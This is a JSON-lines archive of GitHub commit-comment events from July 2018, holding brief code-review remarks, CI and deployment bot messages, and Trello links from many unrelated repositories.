{"id":"7972249936","type":"CommitCommentEvent","actor":{"login":"gazoo74"},"repo":{"name":"savoirfairelinux/cukinia"},"payload":{"comment":{"id":29724761,"position":null,"line":null,"path":null,"commit_id":"91fd724e1e5e2a71020a509ae0552f59eae23a6c","created_at":"2018-07-16T18:41:15Z","updated_at":"2018-07-16T18:41:15Z","author_association":"CONTRIBUTOR","body":"Good catch @ODugas, `-v` was supposed to be `-q`."}},"created_at":"2018-07-16T18:41:15Z"}
{"id":"7972251070","type":"CommitCommentEvent","actor":{"login":"breandan"},"repo":{"name":"duckietown/gym-duckietown"},"payload":{"comment":{"id":29724764,"position":5,"line":25,"path":"docker/standalone/Dockerfile","commit_id":"696c4b5243f8b244a65f6e4dbeef01295a3a0f0c","created_at":"2018-07-16T18:41:28Z","updated_at":"2018-07-16T18:41:28Z","author_association":"MEMBER","body":"@fgolemo How did you build this? AFAIK Docker doesn't allows you to do this:\r\n\r\n```\r\nCOPY failed: Forbidden path outside the build context\r\n```\r\n\r\nWhat we can do is set the build context like this:\r\n\r\n```\r\nsudo docker build -f <PROJECT_DIR>/docker/standalone/Dockerfile <PROJECT_DIR> -t duckietown/gym-duckietown-serve\r\n```\r\n\r\nThis will need to be updated in the README."}},"created_at":"2018-07-16T18:41:28Z"}
{"id":"7972252454","type":"CommitCommentEvent","actor":{"login":"d2fong"},"repo":{"name":"PathwayCommons/app-ui"},"payload":{"comment":{"id":29724768,"position":1,"line":1,"path":"src/styles/features/enrichment.css","commit_id":"2a30df2bdb3201d972e92dc6dd2a379d7a7e7e8b","created_at":"2018-07-16T18:41:44Z","updated_at":"2018-07-16T18:41:44Z","author_association":"MEMBER","body":"@CaitlinOCallaghan This commit is relevant to you.  I moved all enrichment specific css to its own file.  You should put all enrichment specific css here in the future."}},"created_at":"2018-07-16T18:41:44Z"}
{"id":"7972255680","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29724775,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-16T18:42:20Z","updated_at":"2018-07-16T18:42:20Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-16T18:42:20Z"}
{"id":"7972256608","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29724778,"position":null,"line":null,"path":null,"commit_id":"6fbad98e4ef38ebd5389bdd89d5eef3c5d764a3d","created_at":"2018-07-16T18:42:32Z","updated_at":"2018-07-16T18:42:32Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/6fbad98e4ef38ebd5389bdd89d5eef3c5d764a3d/index.html"}},"created_at":"2018-07-16T18:42:32Z"}
{"id":"7972256794","type":"CommitCommentEvent","actor":{"login":"nqpz"},"repo":{"name":"diku-dk/openbanko"},"payload":{"comment":{"id":29724779,"position":null,"line":null,"path":null,"commit_id":"9b0fd0526eceead437ca8af22db35682dbba0abb","created_at":"2018-07-16T18:42:34Z","updated_at":"2018-07-16T18:42:34Z","author_association":"MEMBER","body":"GitHub sagde at min besked ikke kom frem!"}},"created_at":"2018-07-16T18:42:34Z"}
{"id":"7972259136","type":"CommitCommentEvent","actor":{"login":"jgravois"},"repo":{"name":"Esri/node-arcgis"},"payload":{"comment":{"id":29724786,"position":null,"line":null,"path":null,"commit_id":"8b7796c6fa66cf7dba0735a9a58505a700ac43be","created_at":"2018-07-16T18:43:01Z","updated_at":"2018-07-16T18:43:01Z","author_association":"MEMBER","body":"definitely."}},"created_at":"2018-07-16T18:43:01Z"}
{"id":"7972262417","type":"CommitCommentEvent","actor":{"login":"jedeming11"},"repo":{"name":"jedeming11/shiny-tribble"},"payload":{"comment":{"id":29724795,"position":16,"line":115,"path":"Walmart.py","commit_id":"a69d2b477d732807b65ac4ec2679810d070f7d7e","created_at":"2018-07-16T18:43:38Z","updated_at":"2018-07-16T18:43:38Z","author_association":"OWNER","body":"Why did you do this?\r\n"}},"created_at":"2018-07-16T18:43:38Z"}
{"id":"7972264528","type":"CommitCommentEvent","actor":{"login":"gazoo74"},"repo":{"name":"savoirfairelinux/cukinia"},"payload":{"comment":{"id":29724803,"position":null,"line":null,"path":null,"commit_id":"91fd724e1e5e2a71020a509ae0552f59eae23a6c","created_at":"2018-07-16T18:44:02Z","updated_at":"2018-07-16T18:44:02Z","author_association":"CONTRIBUTOR","body":"The rewrite I proposed is a more convenient way to write what we want.\r\n\r\nLess processes/builtins spawned ([...], | cut), less characters in the line which makes it more readable (in my opinion)."}},"created_at":"2018-07-16T18:44:02Z"}
{"id":"7972264572","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29724804,"position":null,"line":null,"path":null,"commit_id":"31c2f1ed70fd6f700f7f0990974670c05b2a121d","created_at":"2018-07-16T18:44:02Z","updated_at":"2018-07-16T18:44:02Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-780](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-780).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-780-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-16T18:44:02Z"}
{"id":"7972267565","type":"CommitCommentEvent","actor":{"login":"alejandroarturom"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29724810,"position":4,"line":793,"path":"android/res/values/strings.xml","commit_id":"64cdc9e0526a31c4d46302cca36a25dc173c66df","created_at":"2018-07-16T18:44:35Z","updated_at":"2018-07-16T18:44:35Z","author_association":"COLLABORATOR","body":"Translations updated (= \r\n#760"}},"created_at":"2018-07-16T18:44:35Z"}
{"id":"7972268560","type":"CommitCommentEvent","actor":{"login":"itravers"},"repo":{"name":"CulturePen/CulturePen.github.io"},"payload":{"comment":{"id":29724814,"position":null,"line":null,"path":null,"commit_id":"fe8f0f8798cf80c3ce7f96aa16b950e70dd33301","created_at":"2018-07-16T18:44:45Z","updated_at":"2018-07-16T18:44:45Z","author_association":"NONE","body":"Good job, just what I would have done in this situation."}},"created_at":"2018-07-16T18:44:45Z"}
{"id":"7972268437","type":"CommitCommentEvent","actor":{"login":"breandan"},"repo":{"name":"duckietown/gym-duckietown"},"payload":{"comment":{"id":29724813,"position":32,"line":32,"path":"Dockerfile","commit_id":"193f8ead54bbe11ee6665d3e086ef41b71dc8e05","created_at":"2018-07-16T18:44:44Z","updated_at":"2018-07-16T18:44:44Z","author_association":"MEMBER","body":"@maximecb Why not `pip install torchvision`?"}},"created_at":"2018-07-16T18:44:44Z"}
{"id":"7972273896","type":"CommitCommentEvent","actor":{"login":"vmundluri"},"repo":{"name":"vmundluri/congenial-octo-spoon"},"payload":{"comment":{"id":29724825,"position":4,"line":2,"path":"README.md","commit_id":"c748867b81602dc35ae95fa0eb25c16626ecdd6d","created_at":"2018-07-16T18:45:46Z","updated_at":"2018-07-16T18:45:46Z","author_association":"OWNER","body":"please correct it"}},"created_at":"2018-07-16T18:45:46Z"}
{"id":"7972274851","type":"CommitCommentEvent","actor":{"login":"mpiraux"},"repo":{"name":"OpenWeek/ictv-plugin-github"},"payload":{"comment":{"id":29724828,"position":null,"line":null,"path":null,"commit_id":"0152fd5d4d7c0ae317cf9ca57f627193465994ea","created_at":"2018-07-16T18:45:57Z","updated_at":"2018-07-16T18:45:57Z","author_association":"COLLABORATOR","body":"I forgot about it actually. On the other hand, no slides are shown when they are empty. If an exception occurs when creating a slide, it is not shown too. I filed an issue anyway, see #1."}},"created_at":"2018-07-16T18:45:57Z"}
{"id":"7972275487","type":"CommitCommentEvent","actor":{"login":"vmundluri"},"repo":{"name":"vmundluri/congenial-octo-spoon"},"payload":{"comment":{"id":29724829,"position":null,"line":null,"path":null,"commit_id":"c748867b81602dc35ae95fa0eb25c16626ecdd6d","created_at":"2018-07-16T18:46:05Z","updated_at":"2018-07-16T18:46:05Z","author_association":"OWNER","body":"comment"}},"created_at":"2018-07-16T18:46:05Z"}
{"id":"7972279687","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/front-end-project-week"},"payload":{"comment":{"id":29724837,"position":null,"line":null,"path":null,"commit_id":"81beda679119db587346dfd82e7e71dce755fd9a","created_at":"2018-07-16T18:46:54Z","updated_at":"2018-07-16T18:46:54Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create a note with a title and content](https://trello.com/c/pwl1GjJh/2-create-a-note-with-a-title-and-content)"}},"created_at":"2018-07-16T18:46:54Z"}
{"id":"7972279724","type":"CommitCommentEvent","actor":{"login":"tsdlau"},"repo":{"name":"bostonRitualClub/tightfit"},"payload":{"comment":{"id":29724838,"position":null,"line":null,"path":null,"commit_id":"949c57038760a189d25238d703efc21a4631ad13","created_at":"2018-07-16T18:46:54Z","updated_at":"2018-07-16T18:46:54Z","author_association":"CONTRIBUTOR","body":"mash that merge button"}},"created_at":"2018-07-16T18:46:54Z"}
{"id":"7972287549","type":"CommitCommentEvent","actor":{"login":"pkolomiy"},"repo":{"name":"jmelnich/matcha"},"payload":{"comment":{"id":29724848,"position":null,"line":null,"path":null,"commit_id":"937d91349915d9adbcbc8a012619601531f62ee1","created_at":"2018-07-16T18:48:25Z","updated_at":"2018-07-16T18:48:25Z","author_association":"COLLABORATOR","body":"deleting one **tag** if to be correct"}},"created_at":"2018-07-16T18:48:25Z"}
{"id":"7972293583","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"aledjones/db-rest"},"payload":{"comment":{"id":29724859,"position":17,"line":32,"path":"readme.md","commit_id":"5d445e9a4e96c8773a83ce3e5e2feb3be580fee9","created_at":"2018-07-16T18:49:31Z","updated_at":"2018-07-16T18:49:31Z","author_association":"NONE","body":"I have just pushed an updated Dockerfile based on `node:alpine` and set up automated builds. You should be able to use the `derhuerst/db-rest` docker image from now on. (Please let me know if it doesn't work.)"}},"created_at":"2018-07-16T18:49:31Z"}
{"id":"7972294577","type":"CommitCommentEvent","actor":{"login":"antonioschaffert"},"repo":{"name":"health-connector/enroll"},"payload":{"comment":{"id":29724861,"position":8,"line":71,"path":"components/benefit_sponsors/app/models/benefit_sponsors/benefit_applications/benefit_application_enrollment_service.rb","commit_id":"191a227d4dd3b64785836626561127f0876ed66a","created_at":"2018-07-16T18:49:41Z","updated_at":"2018-07-16T18:49:41Z","author_association":"NONE","body":"@Battula can you do elsif business_policy.fail_results.keys.include?([:employer_primary_office_location,:benefit_application_fte_count])"}},"created_at":"2018-07-16T18:49:41Z"}
{"id":"7972296748","type":"CommitCommentEvent","actor":{"login":"quintronsystems"},"repo":{"name":"quintronsystems/font-awesome-java"},"payload":{"comment":{"id":29724865,"position":null,"line":null,"path":null,"commit_id":"1b9ff30d480a8ab8ec1ac627e038afae341858f3","created_at":"2018-07-16T18:50:08Z","updated_at":"2018-07-16T18:50:08Z","author_association":"OWNER","body":"I realized that there were a bunch of pro files in the history, as I wasn't isolating our internal pro git repo from the github project repo.  I have gone with the nuclear option and deleted all history for this project.  New commit log: \r\n![image](https://user-images.githubusercontent.com/40472168/42777268-599ab338-88ee-11e8-88c2-f4006885454c.png)\r\n"}},"created_at":"2018-07-16T18:50:08Z"}
{"id":"7972300844","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29724874,"position":12,"line":12,"path":"tests/TicTacToeTest.php","commit_id":"3ffac1b54136046406dd307d484db49ba64d8037","created_at":"2018-07-16T18:50:55Z","updated_at":"2018-07-16T18:50:55Z","author_association":"NONE","body":"Imagine you were sitting at a table with the customer, and he outlined the business rule:\r\n\r\n\"Start The Game With An Empty Map The Current Player Being X\"\r\n\r\nYou have written a test for this business rule, which is great.\r\n\r\nDid you have any further discussions about other business rules as well? About other \"game scenarios\"?\r\n\r\nWrite a test for each of them."}},"created_at":"2018-07-16T18:50:55Z"}
{"id":"7972300883","type":"CommitCommentEvent","actor":{"login":"expez"},"repo":{"name":"clojure-emacs/refactor-nrepl"},"payload":{"comment":{"id":29724875,"position":null,"line":null,"path":null,"commit_id":"3dd98c9737c6ab57f99f7178348696b0fc26e9ed","created_at":"2018-07-16T18:50:55Z","updated_at":"2018-07-16T18:50:55Z","author_association":"MEMBER","body":"Hi @pikeview, unfortunately we're having a hard time getting a new snapshot out.  I've created this [issue](https://github.com/clojure-emacs/refactor-nrepl/issues/229) to track progress"}},"created_at":"2018-07-16T18:50:55Z"}
{"id":"7972306723","type":"CommitCommentEvent","actor":{"login":"ODugas"},"repo":{"name":"savoirfairelinux/cukinia"},"payload":{"comment":{"id":29724893,"position":null,"line":null,"path":null,"commit_id":"91fd724e1e5e2a71020a509ae0552f59eae23a6c","created_at":"2018-07-16T18:52:04Z","updated_at":"2018-07-16T18:52:04Z","author_association":"NONE","body":"less characters make it more clever ... but clever is not always easy to read. Longer, prose-like code makes it more readable. For example, if you want to use the cut command, you could save the output in a variable.\r\n```\r\nname=\"$(echo ... | cut)\"\r\nif [ \"$name\" = \"blah\" ]; then\r\n```"}},"created_at":"2018-07-16T18:52:04Z"}
{"id":"7972311691","type":"CommitCommentEvent","actor":{"login":"ApexModder"},"repo":{"name":"ApexModder/ApexEngine"},"payload":{"comment":{"id":29724898,"position":null,"line":null,"path":null,"commit_id":"4b51508e48942f66bc00ff96abd356f9a19d213b","created_at":"2018-07-16T18:53:01Z","updated_at":"2018-07-16T18:53:01Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [2D Core Engine](https://trello.com/c/bXrAEBkV/21-2d-core-engine)"}},"created_at":"2018-07-16T18:53:01Z"}
{"id":"7972312031","type":"CommitCommentEvent","actor":{"login":"ApexModder"},"repo":{"name":"ApexModder/ApexEngine"},"payload":{"comment":{"id":29724899,"position":null,"line":null,"path":null,"commit_id":"23be1b269a384f6dfb26e2d8683a425060399992","created_at":"2018-07-16T18:53:05Z","updated_at":"2018-07-16T18:53:05Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [2D Core Engine](https://trello.com/c/bXrAEBkV/21-2d-core-engine)"}},"created_at":"2018-07-16T18:53:05Z"}
{"id":"7972312342","type":"CommitCommentEvent","actor":{"login":"Snelgasmic"},"repo":{"name":"Snelgasmic/FourMoreRedFourDooredFordEscorts"},"payload":{"comment":{"id":29724901,"position":null,"line":null,"path":null,"commit_id":"776603663f7a18b95fe4ef528c4a677e3b5c5e16","created_at":"2018-07-16T18:53:10Z","updated_at":"2018-07-16T18:53:10Z","author_association":"OWNER","body":"Going back to the png for mobile lol"}},"created_at":"2018-07-16T18:53:10Z"}
{"id":"7972312349","type":"CommitCommentEvent","actor":{"login":"lsuppu"},"repo":{"name":"lsuppu/Coding_Challenge"},"payload":{"comment":{"id":29724902,"position":null,"line":null,"path":null,"commit_id":"f72ca9a15fad8ab5a0c231c5bb07de816b095795","created_at":"2018-07-16T18:53:10Z","updated_at":"2018-07-16T18:53:10Z","author_association":"OWNER","body":"Small dataset with 5 records"}},"created_at":"2018-07-16T18:53:10Z"}
{"id":"7972312840","type":"CommitCommentEvent","actor":{"login":"ApexModder"},"repo":{"name":"ApexModder/ApexEngine"},"payload":{"comment":{"id":29724903,"position":null,"line":null,"path":null,"commit_id":"4b51508e48942f66bc00ff96abd356f9a19d213b","created_at":"2018-07-16T18:53:15Z","updated_at":"2018-07-16T18:53:15Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [3D Core Engine](https://trello.com/c/M3R6LCyZ/20-3d-core-engine)"}},"created_at":"2018-07-16T18:53:15Z"}
{"id":"7972313102","type":"CommitCommentEvent","actor":{"login":"ApexModder"},"repo":{"name":"ApexModder/ApexEngine"},"payload":{"comment":{"id":29724904,"position":null,"line":null,"path":null,"commit_id":"23be1b269a384f6dfb26e2d8683a425060399992","created_at":"2018-07-16T18:53:18Z","updated_at":"2018-07-16T18:53:18Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [3D Core Engine](https://trello.com/c/M3R6LCyZ/20-3d-core-engine)"}},"created_at":"2018-07-16T18:53:18Z"}
{"id":"7972317514","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29724913,"position":null,"line":null,"path":null,"commit_id":"331296e851e1726bf312eb16234226a56dbb0844","created_at":"2018-07-16T18:54:07Z","updated_at":"2018-07-16T18:54:07Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/box-shadow-based-row-highlighting-for-keyboard-navigation-not-working-on-edge/87964/2\n"}},"created_at":"2018-07-16T18:54:07Z"}
{"id":"7972319351","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"hcodes/yaspeller"},"payload":{"comment":{"id":29724919,"position":null,"line":null,"path":null,"commit_id":"f354b3f06d7635d38c6e7f7674f31dfdca5ba55d","created_at":"2018-07-16T18:54:28Z","updated_at":"2018-07-16T18:54:28Z","author_association":"NONE","body":"Why didn't you add `--comments-only`?"}},"created_at":"2018-07-16T18:54:28Z"}
{"id":"7972324248","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29724928,"position":15,"line":15,"path":"tests/TicTacToeTest.php","commit_id":"3ffac1b54136046406dd307d484db49ba64d8037","created_at":"2018-07-16T18:55:22Z","updated_at":"2018-07-16T18:55:22Z","author_association":"NONE","body":"This line says \"a game consists of one player and a map\". Is this true? Refer back to your .md document."}},"created_at":"2018-07-16T18:55:22Z"}
{"id":"7972327374","type":"CommitCommentEvent","actor":{"login":"reshmarahila"},"repo":{"name":"balinj/question"},"payload":{"comment":{"id":29724931,"position":null,"line":null,"path":null,"commit_id":"adf265d40ab10a8f0bf6c04c01f84fe4dde0551c","created_at":"2018-07-16T18:55:58Z","updated_at":"2018-07-16T18:55:58Z","author_association":"COLLABORATOR","body":"delete event.html"}},"created_at":"2018-07-16T18:55:58Z"}
{"id":"7972334620","type":"CommitCommentEvent","actor":{"login":"adventurer3x"},"repo":{"name":"adventurer3x/initiative-tracker"},"payload":{"comment":{"id":29724943,"position":null,"line":null,"path":null,"commit_id":"878720f4a281179ac1f54e76e7c0480d2d42ac4e","created_at":"2018-07-16T18:57:26Z","updated_at":"2018-07-16T18:57:26Z","author_association":"OWNER","body":"Merging latest from master"}},"created_at":"2018-07-16T18:57:26Z"}
{"id":"7972336368","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29724946,"position":17,"line":17,"path":"tests/TicTacToeTest.php","commit_id":"3ffac1b54136046406dd307d484db49ba64d8037","created_at":"2018-07-16T18:57:46Z","updated_at":"2018-07-16T18:57:46Z","author_association":"NONE","body":"For the symbols 'X' and '0' I would introduce a value object. A value object protects your business models from some corrupt data.\r\n\r\nThis line should read:\r\n\r\n`$this->assertTrue((new Symbol('X'))->equals($game->getCurrentPlayer()));`"}},"created_at":"2018-07-16T18:57:46Z"}
{"id":"7972338878","type":"CommitCommentEvent","actor":{"login":"Shelly7w7"},"repo":{"name":"giantquartz-plugin-collection/SkyBlock"},"payload":{"comment":{"id":29724952,"position":null,"line":null,"path":null,"commit_id":"16df826351e1bb7f8cbc899b84dd2e21ca6132a7","created_at":"2018-07-16T18:58:17Z","updated_at":"2018-07-16T18:58:17Z","author_association":"NONE","body":"Can i get a copy of this? "}},"created_at":"2018-07-16T18:58:17Z"}
{"id":"7972339834","type":"CommitCommentEvent","actor":{"login":"joshi3"},"repo":{"name":"xen0n/xen0n.github.io"},"payload":{"comment":{"id":29724955,"position":null,"line":null,"path":null,"commit_id":"d68f0b47a33e30c603bf2b9f997c826a34897d52","created_at":"2018-07-16T18:58:28Z","updated_at":"2018-07-16T18:58:28Z","author_association":"NONE","body":"sir, i have been following u for months now. I am trying to learn rom stuff and trying to build rom for mtk 6795 we booted oreo but not able to make ril work and bt. Am asking u a help ..if possible please help us to get ril and bt to work. sorry to ping u here am not able to reach u anywhere. Thanks in advance joshi \r\nu will find me at @joshi1 or joshi.naga3@gmail.com "}},"created_at":"2018-07-16T18:58:28Z"}
{"id":"7972340394","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29724956,"position":null,"line":null,"path":null,"commit_id":"34bfffd919151737eabcdf68535cef61d47d0450","created_at":"2018-07-16T18:58:35Z","updated_at":"2018-07-16T18:58:35Z","author_association":"NONE","body":"it's off to Cidhna mine for you"}},"created_at":"2018-07-16T18:58:35Z"}
{"id":"7972346270","type":"CommitCommentEvent","actor":{"login":"nickkolok"},"repo":{"name":"ijustbsd/ipt_connect"},"payload":{"comment":{"id":29724968,"position":11,"line":18,"path":"ipt_connect/IPTdev/templates/IPTdev/head.html","commit_id":"2ee47562538f4a24a73a9fdf9962c7390130be5a","created_at":"2018-07-16T18:59:47Z","updated_at":"2018-07-16T18:59:47Z","author_association":"NONE","body":"Shouldn't we replace the links here?"}},"created_at":"2018-07-16T18:59:47Z"}
{"id":"7972349117","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29724981,"position":13,"line":13,"path":"StudentIQ-boot/src/main/java/ru/otus/elena/studentiqtest/acquaintance/AcquaintanceImpl.java","commit_id":"1e9146214092701f2ff8f61d95887dad1febea9a","created_at":"2018-07-16T19:00:21Z","updated_at":"2018-07-16T19:00:21Z","author_association":"NONE","body":"Красота, но потом в следующих ДЗ мы уже `@ConfigurationProperties` выносим в отдельный компонент - его проще инжектить."}},"created_at":"2018-07-16T19:00:21Z"}
{"id":"7972349990","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29724982,"position":19,"line":19,"path":"tests/TicTacToeTest.php","commit_id":"3ffac1b54136046406dd307d484db49ba64d8037","created_at":"2018-07-16T19:00:30Z","updated_at":"2018-07-16T19:00:30Z","author_association":"NONE","body":"I would not expose the map at this level of abstraction, but instead have a method in the game class which internally routes to map.\r\n\r\nRelated: https://en.wikipedia.org/wiki/Law_of_Demeter\r\n\r\nThis way, the game will be the only object to interact with (at this level of abstraction)."}},"created_at":"2018-07-16T19:00:30Z"}
{"id":"7972352103","type":"CommitCommentEvent","actor":{"login":"nickkolok"},"repo":{"name":"ijustbsd/ipt_connect"},"payload":{"comment":{"id":29724986,"position":8,"line":9,"path":"ipt_connect/IPTdev/views.py","commit_id":"2ee47562538f4a24a73a9fdf9962c7390130be5a","created_at":"2018-07-16T19:00:55Z","updated_at":"2018-07-16T19:00:55Z","author_association":"NONE","body":"To name all the settings directly isn't a convenient way, isn't it? Can we avoid this list?"}},"created_at":"2018-07-16T19:00:55Z"}
{"id":"7972355138","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29724996,"position":null,"line":null,"path":null,"commit_id":"b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a","created_at":"2018-07-16T19:01:29Z","updated_at":"2018-07-16T19:01:29Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - i386-Windows-7-VisualStudio-14: OK (2943 of 2943 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b3a29231fee4b6217bcbcbe6c27d60ed0be22a7a-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-16T19:01:29Z"}
{"id":"7972355741","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29724998,"position":null,"line":null,"path":null,"commit_id":"e339d4f7066330c8aea195af26ef1f13e26c98e5","created_at":"2018-07-16T19:01:36Z","updated_at":"2018-07-16T19:01:36Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-384](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-384).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-384-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T19:01:36Z"}
{"id":"7972362380","type":"CommitCommentEvent","actor":{"login":"nickkolok"},"repo":{"name":"ijustbsd/ipt_connect"},"payload":{"comment":{"id":29725017,"position":17,"line":29,"path":"ipt_connect/IPTdev/views.py","commit_id":"2ee47562538f4a24a73a9fdf9962c7390130be5a","created_at":"2018-07-16T19:02:51Z","updated_at":"2018-07-16T19:02:51Z","author_association":"NONE","body":"What's the reason for passing `name` property? Is't it global?"}},"created_at":"2018-07-16T19:02:51Z"}
{"id":"7972367110","type":"CommitCommentEvent","actor":{"login":"ssrlive"},"repo":{"name":"ShadowsocksR-Live/shadowsocksr-native"},"payload":{"comment":{"id":29725024,"position":20,"line":0,"path":"README.md","commit_id":"72d0c52a43001d1bc0558d1e0ab240b7a4b35697","created_at":"2018-07-16T19:03:43Z","updated_at":"2018-07-16T19:03:43Z","author_association":"MEMBER","body":"no. it's enouth that just  above 3.x "}},"created_at":"2018-07-16T19:03:43Z"}
{"id":"7972371043","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29725034,"position":119,"line":119,"path":"StudentIQ-boot/src/main/java/ru/otus/elena/studentiqtest/iqtest/IQTestImpl.java","commit_id":"1e9146214092701f2ff8f61d95887dad1febea9a","created_at":"2018-07-16T19:04:32Z","updated_at":"2018-07-16T19:04:32Z","author_association":"NONE","body":"Не оставляйте закоммнтированный код в репозитории)"}},"created_at":"2018-07-16T19:04:32Z"}
{"id":"7972373172","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29725037,"position":18,"line":18,"path":"StudentIQ-boot/src/main/resources/banner.txt","commit_id":"1e9146214092701f2ff8f61d95887dad1febea9a","created_at":"2018-07-16T19:04:58Z","updated_at":"2018-07-16T19:04:58Z","author_association":"NONE","body":"Красотаааааа)))"}},"created_at":"2018-07-16T19:04:58Z"}
{"id":"7972374168","type":"CommitCommentEvent","actor":{"login":"mappingvermont"},"repo":{"name":"gfw-api/lambda-tiler"},"payload":{"comment":{"id":29725040,"position":68,"line":28,"path":"app/handler.py","commit_id":"4a3aa58097a55b2190c8b5bfa7b344da18f4ffa4","created_at":"2018-07-16T19:05:12Z","updated_at":"2018-07-16T19:05:12Z","author_association":"NONE","body":"Hey @vincentsarago 👋!\r\n\r\nThis repo is great. Still digging in and removing stuff I don't need for my specific use-case. Will switch to using the `rgb=(1,2,3)` - thanks for the heads up.\r\n\r\nAlso really appreciate all the GDAL environment tuning in `serverless.yml` - many thanks!"}},"created_at":"2018-07-16T19:05:12Z"}
{"id":"7972374794","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29725041,"position":null,"line":null,"path":null,"commit_id":"0337215eca0eb730a12cb2b0d1acf5685527b2ef","created_at":"2018-07-16T19:05:19Z","updated_at":"2018-07-16T19:05:19Z","author_association":"CONTRIBUTOR","body":"Refinement for issue https://github.com/humdrum-tools/verovio-humdrum-viewer/issues/124\r\n\r\nThis change prevents unnecessary `<space>` elements from being inserted when there are pedal marks in another voice/staff.  \r\n"}},"created_at":"2018-07-16T19:05:19Z"}
{"id":"7972379837","type":"CommitCommentEvent","actor":{"login":"oknystad"},"repo":{"name":"ev3dev/ev3-kernel"},"payload":{"comment":{"id":29725054,"position":null,"line":null,"path":null,"commit_id":"d3857f4ca8bdf38f761078ced16eee61c163648b","created_at":"2018-07-16T19:06:19Z","updated_at":"2018-07-16T19:06:19Z","author_association":"NONE","body":"Confirming correct screen orientation after updating kernel. Thank you!"}},"created_at":"2018-07-16T19:06:19Z"}
